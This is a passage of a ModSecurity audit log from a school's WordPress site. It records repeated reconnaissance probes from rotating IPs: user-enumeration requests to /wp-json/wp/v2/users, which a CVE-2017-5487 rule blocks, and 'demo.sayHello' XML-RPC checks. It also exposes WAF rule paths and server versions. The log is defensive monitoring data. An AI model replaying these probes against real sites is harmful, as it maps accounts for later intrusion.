AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1bdf6778-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bdf6778-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495452476287 2380 (- - -) Stopwatch2: 1747495452476287 2380; combined=1010, p1=350, p2=635, p3=0, p4=0, p5=25, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bdf6778-Z-- --4d118a52-A-- [17/May/2025:22:24:20 +0700] aCiqJBKi5m5upc8uMd4QgwAAAMU 103.236.140.4 49474 103.236.140.4 8181 --4d118a52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.8 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d118a52-C-- demo.sayHello --4d118a52-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d118a52-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495460158197 5758 (- - -) Stopwatch2: 1747495460158197 5758; combined=4262, p1=526, p2=3504, p3=36, p4=35, p5=95, sr=77, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d118a52-Z-- --507c9318-A-- [17/May/2025:22:24:20 +0700] aCiqJHyxdQCiyU1ENFebrQAAABU 103.236.140.4 49484 103.236.140.4 8181 --507c9318-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --507c9318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --507c9318-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495460768877 2752 (- - -) Stopwatch2: 1747495460768877 2752; combined=1258, p1=435, p2=795, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --507c9318-Z-- --7f09b16a-A-- [17/May/2025:22:24:27 +0700] aCiqKxKi5m5upc8uMd4QmAAAAMA 103.236.140.4 49618 103.236.140.4 8181 --7f09b16a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7f09b16a-C-- demo.sayHello --7f09b16a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f09b16a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495467843352 5927 (- - -) Stopwatch2: 1747495467843352 5927; combined=4402, p1=546, p2=3634, p3=31, p4=34, p5=93, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f09b16a-Z-- --3b3a1160-A-- [17/May/2025:22:25:26 +0700] aCiqZnyxdQCiyU1ENFecCAAAABg 103.236.140.4 50622 103.236.140.4 8181 --3b3a1160-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b3a1160-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b3a1160-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495526039754 2799 (- - -) Stopwatch2: 1747495526039754 2799; combined=1299, p1=408, p2=861, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b3a1160-Z-- --b0f72612-A-- [17/May/2025:22:25:32 +0700] aCiqbHyxdQCiyU1ENFecEgAAABU 103.236.140.4 50718 103.236.140.4 8181 --b0f72612-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b0f72612-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0f72612-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495532563815 2702 (- - -) Stopwatch2: 1747495532563815 2702; combined=1225, p1=428, p2=757, p3=0, p4=0, p5=39, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0f72612-Z-- --db58023c-A-- [17/May/2025:22:25:34 +0700] aCiqbnyxdQCiyU1ENFecEwAAAAQ 103.236.140.4 50760 103.236.140.4 8181 --db58023c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --db58023c-C-- demo.sayHello --db58023c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --db58023c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495534977470 5775 (- - -) Stopwatch2: 1747495534977470 5775; combined=4238, p1=556, p2=3449, p3=33, p4=36, p5=97, sr=81, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db58023c-Z-- --79326401-A-- [17/May/2025:22:25:40 +0700] aCiqdBKi5m5upc8uMd4RHwAAAMc 103.236.140.4 50858 103.236.140.4 8181 --79326401-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --79326401-C-- demo.sayHello --79326401-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --79326401-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495540653136 5013 (- - -) Stopwatch2: 1747495540653136 5013; combined=3664, p1=472, p2=2974, p3=31, p4=32, p5=89, sr=65, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79326401-Z-- --4dd0dc0b-A-- [17/May/2025:22:26:43 +0700] aCiqsxKi5m5upc8uMd4RQQAAANE 103.236.140.4 52070 103.236.140.4 8181 --4dd0dc0b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4dd0dc0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dd0dc0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495603243340 2311 (- - -) Stopwatch2: 1747495603243340 2311; combined=1007, p1=345, p2=638, p3=0, p4=0, p5=24, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dd0dc0b-Z-- --0b5a9b6d-A-- [17/May/2025:22:26:51 +0700] aCiquxKi5m5upc8uMd4RQgAAAMk 103.236.140.4 52222 103.236.140.4 8181 --0b5a9b6d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0b5a9b6d-C-- demo.sayHello --0b5a9b6d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b5a9b6d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495611611547 5638 (- - -) Stopwatch2: 1747495611611547 5638; combined=4190, p1=533, p2=3436, p3=31, p4=35, p5=92, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b5a9b6d-Z-- --d0279f35-A-- [17/May/2025:22:27:31 +0700] aCiq4-m4kjNN-hEbWjKezwAAAFE 103.236.140.4 52962 103.236.140.4 8181 --d0279f35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d0279f35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0279f35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495651190270 2606 (- - -) Stopwatch2: 1747495651190270 2606; combined=1460, p1=461, p2=959, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0279f35-Z-- --abab9118-A-- [17/May/2025:22:27:40 +0700] aCiq7ATOsBn9MSWb6WLOawAAAJI 103.236.140.4 53106 103.236.140.4 8181 --abab9118-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.241 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --abab9118-C-- demo.sayHello --abab9118-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --abab9118-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495660332590 5191 (- - -) Stopwatch2: 1747495660332590 5191; combined=3777, p1=492, p2=3087, p3=36, p4=31, p5=78, sr=71, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abab9118-Z-- --68e92174-A-- [17/May/2025:22:28:36 +0700] aCirJBKi5m5upc8uMd4RuwAAANA 103.236.140.4 54136 103.236.140.4 8181 --68e92174-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --68e92174-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68e92174-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495716034834 2233 (- - -) Stopwatch2: 1747495716034834 2233; combined=1144, p1=350, p2=764, p3=0, p4=0, p5=29, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68e92174-Z-- --00e8f454-A-- [17/May/2025:22:28:45 +0700] aCirLQTOsBn9MSWb6WLPJAAAAIU 103.236.140.4 54350 103.236.140.4 8181 --00e8f454-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --00e8f454-C-- demo.sayHello --00e8f454-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --00e8f454-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495725565598 17028 (- - -) Stopwatch2: 1747495725565598 17028; combined=27856, p1=502, p2=3495, p3=34, p4=36, p5=11909, sr=71, sw=62, l=0, gc=11818 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00e8f454-Z-- --bede8c15-A-- [17/May/2025:22:29:39 +0700] aCirYxKi5m5upc8uMd4STwAAAM4 103.236.140.4 55416 103.236.140.4 8181 --bede8c15-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bede8c15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bede8c15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495779747164 2796 (- - -) Stopwatch2: 1747495779747164 2796; combined=1206, p1=409, p2=768, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bede8c15-Z-- --b99a7d78-A-- [17/May/2025:22:29:49 +0700] aCirbRKi5m5upc8uMd4SaAAAANU 103.236.140.4 55590 103.236.140.4 8181 --b99a7d78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.181 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b99a7d78-C-- demo.sayHello --b99a7d78-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b99a7d78-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495789103041 6203 (- - -) Stopwatch2: 1747495789103041 6203; combined=4807, p1=657, p2=3899, p3=38, p4=43, p5=101, sr=76, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b99a7d78-Z-- --db46975e-A-- [17/May/2025:22:30:37 +0700] aCirnQTOsBn9MSWb6WLPkQAAAJI 103.236.140.4 56518 103.236.140.4 8181 --db46975e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --db46975e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db46975e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495837221012 2831 (- - -) Stopwatch2: 1747495837221012 2831; combined=1271, p1=448, p2=793, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db46975e-Z-- --863d4420-A-- [17/May/2025:22:30:44 +0700] aCirpATOsBn9MSWb6WLPmgAAAJY 103.236.140.4 56626 103.236.140.4 8181 --863d4420-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.117 X-Forwarded-Host: smkn22-jkt.sch.id 